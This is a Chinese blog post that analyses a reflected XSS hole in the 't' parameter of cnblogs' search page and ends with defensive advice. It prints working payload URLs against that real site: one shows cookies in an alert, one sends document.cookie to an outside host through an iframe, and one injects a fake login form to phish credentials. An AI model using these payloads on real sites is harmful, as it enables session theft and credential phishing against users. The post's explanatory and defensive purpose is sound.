給我一對尖括號，我可以造出整個互聯網

這是一篇關於XSS攻擊的文章，前陣子看到一篇關於博客園找找看XSS漏洞的文章，我研究了一下，發現事隔三個月，漏洞還在，不知為何。

漏洞分析

用一下找找看的搜索功能就容易發現，搜索功能往url中傳遞了兩個參數名“w”和“t”，輸入框對應“w”，搜索分類對應“t”。看不到t參數的，點擊一下搜索框上的分類鏈接就會找到。

按常理，輸入框是最容易發生攻擊的地方，因此找找看也作了防護。根據我的測試，至少有如下兩種防護措施：

1. 正則表達式匹配並刪除字符串包含”<script></script>”的部分。
2. 服務器端對輸入字符串長度做了限制。

雖說方法並不完美，但兩個加一起的確可以達到防護目的。參數“w”安全，可參數“t”卻沒有任何的防護措施，因此，漏洞就在這里。

通過分析代碼，可看到最后”t“傳給了一個隱藏表單，代碼如下：

<input type="hidden" class="txtSeach" name="t" id="t" value="">

那我們只要將該input閉合，就可以隨心所欲的輸入任何內容，比如我們輸入‘Test"/><input type="hidden’，最后的結果就變成：

<input type="hidden" class="txtSeach" name="t" id="t" value="Test"/><input type="hidden"/>

看一下那篇文章中的截圖，基本上就明白如何針對該漏洞進行js腳本攻擊，如下圖：

XSS危害之一 -- Cookie盜取

XSS能做的不只是彈窗，會js的都知道，通過document.cookie可以獲取到cookie信息，為了測試，我們通過alert顯示出來。url地址這樣寫：

http://zzk.cnblogs.com/s?w=hacker&t=a"/><script>alert(document.cookie)</script><input type="hidden

輸入網址會看到cookie值通過彈窗顯示出來，如下圖：

通常，盜取Cookie會做的比較隱秘，不讓用戶覺察。一般的做法是通過構造一個隱藏的iframe，然后將cookie值作為參數隨iframe傳給攻擊者指定的網址。例如，我們把cookie傳給百度站點，可以輸入如下url地址：

http://zzk.cnblogs.com/s?w=hacker&t=a"/><iframe id="myid"></iframe><script>var frame=document.getElementById("myid");frame.src="http://www.baidu.com/?a="%2Bdocument.cookie;</script><input type="hidden

此處為了顯示效果，我們不隱藏iframe，可以看到截圖如下：

通過Fiddler工具可以看到cookie已經傳送出去。一旦把iframe隱藏，用戶點擊鏈接后就基本察覺不到自己的cookie被盜取。

博客園最有用的cookie就是是登錄后產生的名為“.DottextCookie“的cookie了，一旦被盜取，對方就可以直接通過cookie認證登錄到你的賬號（比如用火狐瀏覽器的Firecookie插件來編輯cookie）。

然而，我測試發現，一直無法獲取該cookie，后來發現該cookie被標識為HttpOnly，這導致通過頁面js腳本無法獲取。

因此，折騰一圈下來，雖然找找看功能有漏洞，卻無法盜取到有用的cookie值，我想這也可能是該漏洞一直未處理的原因之一。

XSS危害之二 -- 偽造Html元素，欺騙用戶

HttpOnly雖然是防cookie盜取的利器，但並不意味着可無視Xss漏洞，因為Xss的危害不僅僅是cookie盜取，它還可以偽造Html元素，欺騙用戶提交信息。例如，我們輸入如下url地址：

http://zzk.cnblogs.com/s?w=hacker&t=a"/><script>document.getElementById('searchResult').innerHTML="<div><form><label>Username:</label><input type='text' /><br/><label>Password:</label><input type='text' /><br/><input type='submit' value='submit'/></form></div>";</script><input type="hidden

通過url偽造了一個登錄表單，為了演示目的，我沒有添加樣式，這樣可以看到效果圖如下：

這種效果簡陋，易被看穿，但我相信按照網站風格設計一下css樣式，加上一些提示性的文字，會產生很強的欺騙性，用一些誘惑性的文字或圖片很容易吸引用戶點擊並上鈎，因為用戶往往對域名正確的頁面容易放松警惕，正所謂散彈打鳥，總會碰到幾個笨的。因此這種XSS攻擊雖沒有直接盜取cookie，依然會造成不小的危害。

XSS的防護措施

有不少人在我前一篇關於SQL攻擊的文章中留言問如何防護。其實我覺得看懂了攻擊方式，基本也就知道如何防護了。對於SQL注入，參數化查詢就可以完全勝任，甚至你只屏蔽單引號也一樣有很好的效果。

對於Xss攻擊，防護措施如下：

1. 上面提到的博客園的做法--正則匹配加長度限制。
2. 將不需要在客戶端操作的cookie設置為HttpOnly。
3. 使用第三方類庫，如AntiXSS。
4. 對用戶輸入內容進行Html編碼，例如asp.net mvc中的MvcHtmlString類，總是將字符串編碼以后再顯示。

方法很多且容易，但真正能使系統安全穩定，還要歸根於設計者本人，就像找找看功能，對輸入框進行了防護，卻忘記對另外一個參數進行處理，關鍵在於設計每一個功能的時候，腦中是否有防護的概念，是否用心。

結語

阿基米德說過：”給我一個杠桿，我可以翹起整個地球。“為了表述XSS的危害，我也模仿這種語氣，寫個誑語：”給我一對尖括號，我可以造出整個互聯網。“